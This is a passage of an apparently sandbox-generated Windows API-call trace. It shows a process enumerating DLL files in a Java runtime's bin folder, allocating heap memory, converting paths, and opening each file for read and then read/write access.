hHeap=0x20000) returned 1 [0090.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.959] AreFileApisANSI () returned 1 [0090.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0090.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76110 [0090.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll") returned 53 [0090.959] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_socket.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x6040)) returned 1 [0090.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0090.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0090.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0090.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0090.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.959] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x21440, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="eula.dll", cAlternateFileName="")) returned 1 [0090.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0090.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0090.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0090.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0090.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0090.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0090.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0090.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0090.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0090.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0090.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0090.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0090.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0090.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.960] AreFileApisANSI () returned 1 [0090.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll", lpUsedDefaultChar=0x0) returned 48 [0090.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0090.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0090.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0090.961] AreFileApisANSI () returned 1 [0090.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0090.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0090.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll") returned 48 [0090.961] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\eula.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0090.961] GetFileType (hFile=0x418) returned 0x1 [0090.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0090.961] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0090.961] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0090.962] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0090.962] CloseHandle (hObject=0x418) returned 1 [0090.962] AreFileApisANSI () returned 1 [0090.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0090.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0090.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll") returned 48 [0090.962] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\eula.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0090.962] GetFileType (hFile=0x418) returned 0x1 [0090.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0090.962] CloseHandle (hObject=0x418) returned 1 [0090.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0090.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0090.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.963] AreFileApisANSI () returned 1 [0090.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0090.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0090.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll") returned 48 [0090.963] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\eula.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x21440)) returned 1 [0090.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0090.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0090.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0090.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.964] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x43040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="fontmanager.dll", cAlternateFileName="FONTMA~1.DLL")) returned 1 [0090.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0090.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0090.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0090.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0090.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0090.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0090.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0090.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0090.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0090.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0090.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0090.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0090.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0090.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.965] AreFileApisANSI () returned 1 [0090.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll", lpUsedDefaultChar=0x0) returned 55 [0090.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0090.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0090.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0090.965] AreFileApisANSI () returned 1 [0090.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0090.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76110 [0090.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll") returned 55 [0090.965] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fontmanager.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0090.989] GetFileType (hFile=0x418) returned 0x1 [0090.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0090.989] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0090.990] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0090.990] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0090.990] CloseHandle (hObject=0x418) returned 1 [0090.990] AreFileApisANSI () returned 1 [0090.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0090.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75eb8 [0090.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75eb8, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll") returned 55 [0090.990] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fontmanager.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0090.990] GetFileType (hFile=0x418) returned 0x1 [0090.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0090.991] CloseHandle (hObject=0x418) returned 1 [0090.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) 